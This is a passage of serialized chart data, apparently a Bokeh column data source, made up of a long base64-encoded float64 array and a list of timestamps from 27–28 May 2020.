dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz8x8H2zGpiYP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enPzHwfbMamJg/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enPzHwfbMamJg/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz8x8H2zGpiYP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz++ranY8wiZP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/MfB9sxqYmD/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/7fIzHAF+JP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/+3yMxwBfiT/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP/t8jMcAX4k/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz/dRaXnS9enP91FpedL16c/3UWl50vXpz8=\",\"dtype\":\"float64\",\"shape\":[2689]},\"time_col\":[\"2020-05-28 04:18:17+00:00\",\"2020-05-28 04:23:23+00:00\",\"2020-05-28 04:13:08+00:00\",\"2020-05-28 04:42:30+00:00\",\"2020-05-28 04:02:45+00:00\",\"2020-05-28 04:07:52+00:00\",\"2020-05-28 04:27:38+00:00\",\"2020-05-28 04:32:51+00:00\",\"2020-05-28 04:38:17+00:00\",\"2020-05-28 04:47:58+00:00\",\"2020-05-28 04:53:27+00:00\",\"2020-05-28 12:12:34+00:00\",\"2020-05-28 12:28:14+00:00\",\"2020-05-28 12:08:25+00:00\",\"2020-05-28 12:17:42+00:00\",\"2020-05-28 12:23:04+00:00\",\"2020-05-28 12:37:30+00:00\",\"2020-05-28 12:48:30+00:00\",\"2020-05-28 12:52:51+00:00\",\"2020-05-28 12:03:14+00:00\",\"2020-05-28 12:33:26+00:00\",\"2020-05-28 12:43:01+00:00\",\"2020-05-28 02:02:43+00:00\",\"2020-05-28 02:18:11+00:00\",\"2020-05-28 02:32:37+00:00\",\"2020-05-28 02:48:04+00:00\",\"2020-05-28 02:53:10+00:00\",\"2020-05-28 02:07:50+00:00\",\"2020-05-28 02:23:25+00:00\",\"2020-05-28 02:28:26+00:00\",\"2020-05-28 02:13:01+00:00\",\"2020-05-28 02:37:45+00:00\",\"2020-05-28 02:42:56+00:00\",\"2020-05-28 11:08:24+00:00\",\"2020-05-28 11:12:28+00:00\",\"2020-05-28 11:22:47+00:00\",\"2020-05-28 11:38:29+00:00\",\"2020-05-28 11:03:11+00:00\",\"2020-05-28 11:17:41+00:00\",\"2020-05-28 11:42:38+00:00\",\"2020-05-28 11:52:56+00:00\",\"2020-05-28 11:27:57+00:00\",\"2020-05-28 11:33:09+00:00\",\"2020-05-28 11:47:43+00:00\",\"2020-05-27 19:07:51+00:00\",\"2020-05-27 19:23:09+00:00\",\"2020-05-27 19:32:57+00:00\",\"2020-05-27 19:47:56+00:00\",\"2020-05-27 19:53:16+00:00\",\"2020-05-27 19:03:29+00:00\",\"2020-05-27 19:13:31+00:00\",\"2020-05-27 19:17:40+00:00\",\"2020-05-27 19:38:16+00:00\",\"2020-05-27 19:27:35+00:00\",\"2020-05-27 19:42:33+00:00\",\"2020-05-28 14:12:38+00:00\",\"2020-05-28 14:27:54+00:00\",\"2020-05-28 14:43:07+00:00\",\"2020-05-28 14:47:31+00:00\",\"2020-05-28 14:02:50+00:00\",\"2020-05-28 14:08:16+00:00\",\"2020-05-28 14:18:09+00:00\",\"2020-05-28 14:22:31+00:00\",\"2020-05-28 14:33:19+00:00\",\"2020-05-28 14:52:58+00:00\",\"2020-05-28 